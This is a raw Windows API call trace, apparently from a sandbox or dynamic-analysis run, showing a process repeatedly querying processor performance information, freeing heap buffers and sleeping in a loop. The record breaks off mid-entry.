[0243.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0243.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0243.087] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0243.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0243.088] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0243.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0243.088] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0243.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.089] Sleep (dwMilliseconds=0x110) [0243.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0243.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0243.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0243.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0243.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0243.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0243.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.097] Sleep (dwMilliseconds=0x110) [0243.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0243.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0243.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0243.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0243.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0243.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0243.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0243.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0243.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.165] Sleep (dwMilliseconds=0x110) [0243.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0243.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0243.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0243.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0243.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0243.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0243.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.176] Sleep (dwMilliseconds=0x110) [0243.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0243.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0243.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0243.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0243.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0243.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0243.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.192] Sleep (dwMilliseconds=0x110) [0243.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0243.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0243.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0243.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0243.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0243.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0243.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0243.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0243.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.207] Sleep (dwMilliseconds=0x110) [0243.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0243.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0243.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0243.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0243.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0243.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0243.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0243.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0243.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.221] Sleep (dwMilliseconds=0x110) [0243.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0243.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0243.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0243.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0243.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0243.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0243.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0243.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0243.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.237] Sleep (dwMilliseconds=0x110) [0243.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0243.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0243.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0243.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0243.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0243.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0243.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.253] Sleep (dwMilliseconds=0x110) [0243.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0243.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.263] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0243.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0243.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0243.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0243.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0243.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0243.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0243.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.268] Sleep (dwMilliseconds=0x110) [0243.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0243.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0243.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0243.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0243.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0243.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0243.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0243.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0243.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.282] Sleep (dwMilliseconds=0x110) [0243.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0243.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0243.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0243.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0243.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0243.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0243.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.300] Sleep (dwMilliseconds=0x110) [0243.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0243.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0243.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0243.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0243.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0243.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0243.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.313] Sleep (dwMilliseconds=0x110) [0243.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0243.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0243.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0243.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0243.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0243.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0243.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0243.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0243.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 